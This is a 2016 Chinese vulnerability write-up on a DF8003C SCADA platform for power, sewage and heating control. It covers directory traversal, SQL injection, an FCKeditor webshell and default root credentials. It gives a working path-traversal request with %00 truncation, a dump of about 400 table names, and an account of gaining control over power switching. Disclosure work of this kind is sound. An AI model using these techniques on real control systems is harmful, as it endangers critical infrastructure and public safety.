首页 > 安全 > 系统安全 >

某大型SCADA通用系统多处漏洞可控制/电压系统/污水处理系统/供电设备系统(无需登录getshell)

2016-07-12

最后才发现这是跟我开的一个玩笑!

最后才发现这是跟我开的一个玩笑!

狗哥:这次硬不硬

#1 前言

系统采用的是一款东方DF8003C型号的控制系统,这里有个简单介绍

http://**.**.**.**/link?url=voTDWhx82NQaCYRe9JGAbzuPxDjetIru7aYlyyl7EFpVEOofDyRykcDYdPQNGmitPvCrco9_mcFQhheNDu4YYsKP7e01YDsCx4MBLzPX6CK

系统能进行操作的功能如简介里面一样

1.png

#2 漏洞

这套系统问题多,我前期排查一共发现三处高危漏洞,其中两处可直接利用

第一处:目录遍历

**.**.**.**:5000

help/php

目录下直接遍历很多关键文件

1.png

第二处:

大家应该也已经看到fck编辑器了吧,这里就不说这个编辑器了

第三处:

这套系统存在一个通用SQL注入漏洞

#3 测试中...

找到SQL注入漏洞,那问题也很简单,只需要找到管理员的表即可

| C2000_动作信息 |

| C2000_定值信息 |

| C2000_测量类型 |

| C2000_自检信息 |

| CAS2000_动作信息 |

| CAS2000_故障信息 |

| CAS2000_测量信息 |

| CAS2000_自诊断信息 |

| CDT扩展五防规约配置表 |

| CDT规约配置表 |

| CSC2000_动作信息 |

| CSC2000_定值信息 |

| CSC2000_故障信息 |

| CSC2000_自诊断信息 |

| CSC2000_量测信息 |

| DA出口开关参数表 |

| DA区域参数表 |

| DA开关拓扑表 |

| DA故障事项表 |

| DA故障定位信息表 |

| DA故障待恢复区域信息表 |

| DA故障待恢复系统信息表 |

| DA故障恢复开关信息表 |

| DA故障恢复方案? |

| DA故障扩大隔离开关信息表 |

| DA故障索引表 |

| DA故障隔离开关信息表 |

| DA环网柜开关表 |

| DA线路拓扑表 |

| DA运行参数设置表 |

| DF3000NEW_动作信息 |

| DF3000NEW_定值信息 |

| DF3000NEW_辅助定值信息 |

| DF3000NEW_量测信息 |

| DF3003_动作自检 |

| DF3003_定值信息 |

| DF3003_量测信息 |

| DF3600_动作信息 |

| DF3600_定值信息 |

| DF3600_故障信息 |

| DF3600_测量值信息 |

| DF3600_量测信息 |

| DFP500_定值信息 |

| DFP500_开关量 |

| DFP500_故障信息 |

| DFP500_测量值 |

| DFP500_自诊断信息 |

| DFP_动作信息 |

| DFP_定值量值 |

| DFP_定值量值类型 |

| DFP_自检信息 |

| DM配置类型索引表 |

| DM配置表 |

| DSA_301动作信息 |

| DSA_301定值信息 |

| DSA_301故障信息 |

| DSA_301测量值信息 |

| DSA_301自诊断信息 |

| DWK_动作信息 |

| DWK_故障信息 |

| EMS线路段参数表 |

| EPRISVC_事件信息 |

| EPRISVC_定值信息 |

| EPRISVC_开出信息 |

| EPRISVC帧类别 |

| EPRISVC模块类型 |

| FBZ_动作信息 |

| FBZ_定值信息 |

| FBZ_故障信息 |

| FBZ_自诊断信息 |

| FBZ_量测信息 |

| FDK高速采样模块参数表 |

| FWB_动作信息 |

| FWB_定值信息 |

| FWB_测量信息 |

| FWB_诊断信息 |

| FWB_配置信息 |

| GPRS参数表 |

| HUANENG_定值信息 |

| HUANENG_量测信息 |

| IEC101zf规约配置表 |

| IEC101规约配置表 |

| IEC103_ASDU1 |

| IEC103_ASDU10 |

| IEC103_ASDU2 |

| IEC103_故障信息 |

| IEC103信息对照表 |

| IEC103装置类型表 |

| IEC104zf规约配置表 |

| IEC104规约配置表 |

| ISA300_动作信息 |

| ISA300_定值信息 |

| ISA300_故障信息 |

| ISA300_自诊断信息 |

| ISA300_量测信息 |

| ISA_动作信息 |

| ISA_定值信息 |

| ISA_小电流接地表 |

| ISA_故障信息 |

| ISA_测量值信息 |

| ISA_自诊断信息 |

| JINNENG_定值信息 |

| LFP_事件信息 |

| LFP_定值信息 |

| LFP_开关量信息 |

| LFP_模块信息 |

| LFP_模拟量信息 |

| LFP_自检信息 |

| LSA_P_动作信息 |

| LSA_P_定值信息 |

| LSA_P_故障信息 |

| LSA_P_测量值信息 |

| LSA_P_自诊断信息 |

| MLN98_小电流接地表 |

| N4F配置表 |

| NEWISA_动作信息 |

| NEWISA_定值信息 |

| NEWISA_小电流接地表 |

| NEWISA_故障信息 |

| NEWISA_测量值信息 |

| NEWISA_自诊断信息 |

| NZC_事件信息 |

| RCS9000_动作信息 |

| RCS9000_开关量状态 |

| RDCU_动作信息 |

| RDCU_定值信息 |

| RTU值表 |

| RTU参数表 |

| RTU路径参数表 |

| RTU路径状态值表 |

| SAC94_事件信息 |

| SBC_动作信息 |

| SCADA_MIS设备对照表 |

| SCADA应用对象类型表 |

| SCIZF配置表 |

| SCI配置表 |

| SEL_动作信息 |

| TIGER_定值信息 |

| TOPO开关刀闸参数表 |

| TOPO母线参数表 |

| TOPO线路参数表 |

| TOPO连接节点表 |

| UT99_定值信息 |

| VW_EVT_TYPE |

| WBX_事件信息 |

| WBX_定值信息 |

| WBX_测量信息 |

| WEB_AOPINFO |

| WEB_MACHINE |

| WEB_ONLINE |

| WEB_USERS |

| XAKY_定值信息 |

| XJS99_定值信息 |

| XJS99模块类型 |

| ZH_定值信息 |

| ZH_测量值信息 |

|  |

| ! |

| ! |

| 保护DF3003装置类型 |

| 刀闸表 |

| 报警图索引表 |

| 状态信息表 |

| 规约配置表 |

| 追忆参数表\x03 |

| 追忆组信息表\x05 |

| dnp规约配置表 |

| dtproperties |

| histable |

| histableother |

| newid |

| reltable |

| sysconstraints |

| syssegments |

| testtb |

| tmp_code |

| tmp_codeone |

| tmp_compare |

| tmp_count |

| tmp_data |

| tmp_maxtime |

| tmp_mintime |

| tmp_mondata |

| tmp_mondate |

| tmp_over |

| tmp_overone |

| tmp_overvoltage |

| tmp_total |

| tmp_voltage |

| tmp_yccode |

| tmp_yeardata |

| tmp_yeardate |

| tp_max |

| tp_min |

| trashid |

| viewtable |

| 主机状态表 |

| 事项句表 |

| 事项处理方式表I |

| 事项模式表 |

| 事项状态描述表 |

| 事项类型信息表 |

| 事项类型表 |

| 事项级别表 |

| 五防控制对象表 |

| 五防控制条件表 |

| 五防控制组表 |

| 五防操作序列表 |

| 五防操作组表 |

| 五防设备许可表 |

| 保护DF3000NEW装置类型 |

| 保护DF3003功能类型 |

| 保护DF3600装置类型 |

| 保护FWB模块类型 |

| 保护HUANENG模块类型 |

| 保护JINNENG模块类型 |

| 保护LFP模块类型 |

| 保护NEWISA装置类型 |

| 保护RCS9000模块类型 |

| 保护RDCU_模块类型 |

| 保护SAC94事件类型 |

| 保护SEL动作类型 |

| 保护SEL模块类型 |

| 保护UT99模块类型 |

| 保护WBX保护类型 |

| 保护WBX功能类型 |

| 保护XJ事件类型 |

| 保护信号值表 |

| 保护信号表 |

| 保护类型1表 |

| 保护类型2表 |

| 保护类型表 |

| 保护装置表 |

| 保护规约类型表 |

| 公司参数表 |

| 其他转发视图 |

| 刀闸值表 |

| 刀闸参数表 |

| 分接头类型表 |

| 列查询配置表 |

| 前置事故总配置表 |

| 前置终端服务器表 |

| 前置计算配置表 |

| 前置配置表 |

| 区域参数表 |

| 升降参数表 |

| 厂站参数表 |

| 厂站表 |

| 厂站遥控闭锁对应表 |

| 厂站遥控闭锁表 |

| 历史数据期限表 |

| 历史服务器容量参数表 |

| 参数域属性表 |

| 参数表中间索引关系 |

| 参数表属性表 |

| 双遥控号对照表 |

| 发电机参数表 |

| 变压器参数表 |

| 变压器接线类型表 |

| 同期参数表 |

| 图形文件共享表 |

| 图形装饰域参数表 |

| 图形设备分类表 |

| 地标参数表 |

| 域修改配置表 |

| 域显示属性表 |

| 多态值表 |

| 多态参数表 |

| 定时打印信息表 |

| 实时库列模式 |

| 实时库域名表 |

| 实时库表名表 |

| 实时库表模式 |

| 实时库装载关系表 |

| 实时数据服务器名表 |

| 容器分量表 |

| 容器表 |

| 常用参数表 |

| 序列控制参数表 |

| 序列控制对象表 |

| 开关保护关系表 |

| 开关保护模块关系表 |

| 开关值表 |

| 开关刀闸参数表 |

| 开关参数表 |

| 开关替代关系表 |

| 开关表 |

| 开关连接刀闸表 |

| 开关连接设备表 |

| 微机保护参数表 |

| 微机保护权限表 |

| 报表 |

| 报表打印信息表 |

| 报表用户权限表 |

| 故障检测状态表 |

| 数据库应用分类索引表 |

| 数据库状态表 |

| 日时段参数表 |

| 日时段组名表 |

| 时段区域名表 |

| 时段参数表 |

| 服务器状态表 |

| 权限功能定义表 |

| 标志牌功能信息表 |

| 标志牌操作菜单配置表 |

| 标志牌记录表 |

| 档位信息表 |

| 档位遥调参数表 |

| 模拟量值表 |

| 次遥信号排序表 |

| 母线参数表 |

| 母线拓扑表 |

| 母线表 |

| 消弧线圈 |

| 消弧线圈档位表 |

| 状态值表 |

| 状态控制条件表 |

| 状态表 |

| 用户口令表 |

| 用户定义表 |

| 用户组表 |

| 用户角色表 |

| 用户责任区表 |

| 用户过程表 |

| 电压互感器表 |

| 电压名表 |

| 电压等级颜色对照表 |

| 电压等级颜色表 |

| 电压限值表 |

| 电子值班事项表 |

| 电子值班接收遥测用户表 |

| 电子值班用户表 |

| 电子值班短信遥测发送表 |

| 电子值班遥信点事项表 |

| 电子值班遥测点事项表 |

| 电容器参数表 |

| 电度值表 |

| 电度参数表 |

| 电度多源信息表 |

| 电度多源索引表 |

| 电度转发视图 |

| 电抗器参数表 |

| 电流互感器表 |

| 界面显示参数表 |

| 秒级曲线参数表 |

| 程序注册表 |

| 端子表 |

| 线路参数表 |

| 线路型号表 |

| 自定义潮流表 |

| 节点事项表 |

| 节点事项过滤表 |

| 节点厂站过滤表 |

| 节点对象过滤表 |

| 节点权限表 |

| 节点责任区表 |

| 节点镜像类型表 |

| 菜单属性表 |

| 表对象类型关系表 |

| 规约类型表 |

| 规约配置类型表 |

| 角色定义表 |

| 计算变量值表 |

| 计算变量表 |

| 设备对象类型关系表 |

| 设备状态表 |

| 设备类型表 |

| 负荷参数表 |

| 责任区定义表 |

| 转发遥控对照表 |

| 转发遥调对照表 |

| 远动规约类型视图 |

| 连接节点表 |

| 追态值表 |

| 通讯参数表 |

| 通讯组表 |

| 通讯组表前置视图 |

| 通道值表 |

| 通道参数表 |

| 通道报文日志表 |

| 通道曲线偏移表 |

| 通道状态值表 |

| 通道透明转发表 |

| 通道附属属性表 |

| 遥信参数表 |

| 遥信号排序表 |

| 遥信多源信息表 |

| 遥信多源索引表 |

| 遥信转发视图 |

| 遥控参数表 |

| 遥控提示表 |

| 遥测参数表 |

| 遥测多源信息表 |

| 遥测多源索引表 |

| 遥测报警限值表 |

| 遥测转发视图 |

| 遥测限值时段参数表 |

| 遥测限值时段类型表 |

| 遥调参数表 |

| 避雷器表 |

| 配调控制对象表 |

| 量测映射表 |

| 量测量参数表 |

| 镜像表模式 |

| 间隔值表 |

| 间隔参数表 |

| 零支路表 |

| dboutpara |

+-----------------+

一共409张表,后面找到管理员登录密码及账号

1.png

戏剧性的一幕来了,测试了半天,拿着注入出来的账号密码,满心欢喜的想登录,却发现怎么都是提示登录失败,无论在后台还是在前台都是如此

这突然心情....

这个时候我记得我之前突然找的到一张表,表名是用户口令表,但里面只出现了一个root

但是这个root却是关键了

进行登录账号密码的尝试

1.png

这样就进去了,切换到前台进行登录

1.png

这里可以直接进行电压和电力设备的开启及关闭

1.png

这套系统有人挖过,不再阐述太多。

第二台SCADA控制系统

这套问题相对来说 还要多一些,同时存在SQL注入及任意文件读取漏洞,需要%00截断

1.png

有了前一次的教训,既然系统界面大致一样,我在进行目录探测时,发现结构大概差不多,

会不会也是同样存在user表?又或者账号和密码都是默认生成的?

结果发现证明了我的观点

任意文件读取漏洞

**.**.**.**:8181/modules/tmr/server/switchcontrolpanel.php?func=../../../../../../../../../../windows/win.ini%00.jpg

利用前一次的账号密码,直接进行了登录

1.png

系统界面大致一样,但功能还要强大一些,能操作配电系统、污水处理系统、热力站、深井检测系统

1.png

能开关多个区域供电设备

1.png

2.png

实时监控数据

1.png

1.png

利用fck编辑器

可以getshell

1.png

1.png

1.png

2.png

还有一个系统我就不测试了,到此结束

声明:未进行任何相关危险操作

解决方案:

1.参数过滤

2.对访问目录的限制

3.编辑器修复或升级编辑器版本

相关文章
最新文章
热点推荐